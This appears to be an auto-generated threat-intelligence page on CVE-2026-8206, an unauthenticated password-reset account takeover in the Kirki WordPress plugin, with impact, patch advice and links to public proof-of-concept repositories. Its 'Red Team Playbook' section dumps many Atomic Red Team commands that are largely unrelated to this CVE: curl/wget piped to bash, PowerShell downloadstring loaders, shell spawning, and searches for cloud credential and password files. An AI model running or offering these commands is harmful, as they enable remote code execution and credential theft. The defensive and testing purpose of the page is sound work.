CVE-2026-8206
Overview
This vulnerability is a privilege escalation flaw caused by improper validation in the password reset functionality of the Kirki – Freeform Page Builder plugin for WordPress. The root cause lies in the plugin accepting an arbitrary email address when a username is submitted during a password reset request. The affected component is the password reset handler within the plugin's form processing logic, which fails to verify that the email corresponds to the username provided.
Vulnerability Description
The Kirki – Freeform Page Builder, Website Builder & Customizer plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions 6.0.0 to 6.0.6. This is due to the plugin accepting an arbitrary email address when a username is used in the password reset request. This makes it possible for unauthenticated attackers to send a password reset link for any user registered on the site to their own email address.
Impact
An unauthenticated attacker can trigger password reset emails to be sent to an attacker-controlled address for any registered user, enabling account takeover by resetting the victim's password. This allows unauthorized access to user accounts, potentially including administrative accounts, leading to full control over the affected WordPress site. No prior authentication or user interaction is required, making this vulnerability highly exploitable and capable of resulting in data breaches and site compromise.
Solution
Upgrade the Kirki – Freeform Page Builder plugin to version 6.0.7 or later, where this issue is addressed by validating that the email address in password reset requests matches the registered email for the specified username. Refer to the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/3b5630bd-5bce-4226-959f-5e81ae69b799 for detailed patch instructions and verification steps. Applying this update eliminates the arbitrary email acceptance flaw in the password reset process.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Kirki Freeform Page Builder plugin for WordPress is rooted in its flawed handling of password reset requests. Specifically, the plugin allows an attacker to exploit the password reset functionality by submitting a username along with an arbitrary email address. This design flaw permits unauthorized users to request a password reset link for any registered user on the site, which is then sent to the attacker’s email. The core issue lies in the lack of proper validation and verification of the email address being used, leading to a significant security breach that can facilitate account takeover.
Attack vectors for this vulnerability are straightforward yet highly effective. An attacker can initiate the process by identifying a target WordPress site using the vulnerable plugin. By simply knowing or guessing a valid username, the attacker can request a password reset link. Since the system does not verify the ownership of the email address, the attacker can receive the reset link in their own inbox, enabling them to gain access to the victim's account. This exploitation can be executed without any prior authentication, making it particularly dangerous as it lowers the barrier for entry for potential attackers. Scenarios could range from personal vendettas to more organized attacks aimed at compromising multiple accounts on a site, especially if the site holds sensitive user data.
The real-world impact of this vulnerability can be severe, particularly for businesses that rely on the affected plugin for their WordPress sites. Successful exploitation can lead to unauthorized access to user accounts, resulting in data breaches, loss of sensitive information, and potential financial losses. Furthermore, the breach of user trust can have long-lasting effects on a business's reputation, leading to customer attrition and legal repercussions. In a landscape where data protection regulations are becoming increasingly stringent, the consequences of failing to secure user accounts can result in significant fines and legal liabilities. The high CVSS score of 9.8 underscores the critical nature of this vulnerability and the urgency for affected organizations to address it.
To detect and mitigate this vulnerability, organizations should first ensure that they are using the latest version of the Kirki plugin, as updates often include security patches. Regular audits of plugins and themes used in WordPress installations are essential to identify any outdated or vulnerable components. Additionally, implementing strong security practices, such as two-factor authentication (2FA) for user accounts, can help mitigate the risk of account takeovers. Monitoring user account activity for unusual behavior can also serve as an early warning system for potential exploitation. Educating users about the importance of strong, unique passwords and the risks associated with phishing attempts can further bolster defenses against such vulnerabilities.
In conclusion, the privilege escalation vulnerability in the Kirki Freeform Page Builder plugin poses a significant threat to WordPress sites. The ease of exploitation combined with the potential for severe consequences makes it imperative for organizations to prioritize security measures. By staying informed about vulnerabilities, applying timely updates, and fostering a culture of security awareness, businesses can protect themselves and their users from the risks associated with this and similar vulnerabilities.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2026-8206, coinciding with the emergence of multiple public proof-of-concept exploits hosted on GitHub. This development has broadened the exploit landscape, lowering the barrier for threat actors to weaponize the vulnerability in the Kirki Freeform Page Builder plugin. Our telemetry indicates a significant increase in attempts to leverage this unauthenticated privilege escalation flaw, underscoring its growing attractiveness to attackers. Although the EPSS score remains relatively low, the rapid proliferation of exploit code and the availability of mass exploitation tools signal an elevated risk of widespread compromise. This shift elevates the threat level from theoretical to actively exploited, necessitating heightened vigilance from defenders as adversaries can now more readily execute account takeovers and privilege escalations on vulnerable WordPress sites.
Update 2 — June 19, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2026-8206, evidenced by a steady increase in detection signals and a substantial rise in the Exploit Prediction Scoring System (EPSS) metric. This surge coincides with the emergence of new proof-of-concept exploits and the release of mass exploitation tools on public repositories, significantly lowering the barrier for threat actors to weaponize this vulnerability. The rapid growth in exploit availability and the expanding exploitation landscape indicate that adversaries are accelerating efforts to leverage unauthenticated privilege escalation via the Kirki WordPress plugin. For defenders, this development signals an elevated operational risk as automated and large-scale attacks become more feasible, increasing the likelihood of successful account takeovers and subsequent privilege escalations. Consequently, the threat level for CVE-2026-8206 has shifted from moderate concern to a heightened state of alert, reflecting its transition from niche exploitation attempts to broader, more aggressive targeting campaigns.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (5)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Jenderal92/CVE-2026-8206
Mass exploitation tool for CVE-2026-8206 – Unauthenticated Privilege Escalation via 'handle_forgot_password' in Kirki Wo...
|
Jenderal92 | 1 | 1 | 2026-06-02 | View |
|
amnsecurity/CVE-2026-8206-Kirki-WP
CVE-2026-8206 - Kirki WordPress Plugin Unauthenticated Account Takeover - PoC & Analysis | CVSS 9.8 CRITICAL | AMN SECUR...
|
amnsecurity | 0 | 0 | 2026-07-08 | View |
|
izxci/CVE-2026-8206
CVE-2026-8206 Kirki Plugin Unauthenticated Account Takeover Exploit
|
izxci | 0 | 0 | 2026-06-17 | View |
|
O99099O/CVE-2026-8206-Poc-
|
O99099O | 0 | 0 | 2026-06-01 | View |
|
rootdirective-sec/CVE-2026-8206-Lab
|
rootdirective-sec | 0 | 0 | 2026-06-05 | View |
Threat Feed
12 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Active exploitation confirmed — vendor: themeum, product: Kirki – Freeform Page Builder, Website Builder & Customizer
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-58 | Restful Privilege Elevation |
35%
|
High | High | |
| CAPEC-122 | Privilege Abuse |
30%
|
High | Medium | |
| CAPEC-233 | Privilege Escalation |
30%
|
— | — |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.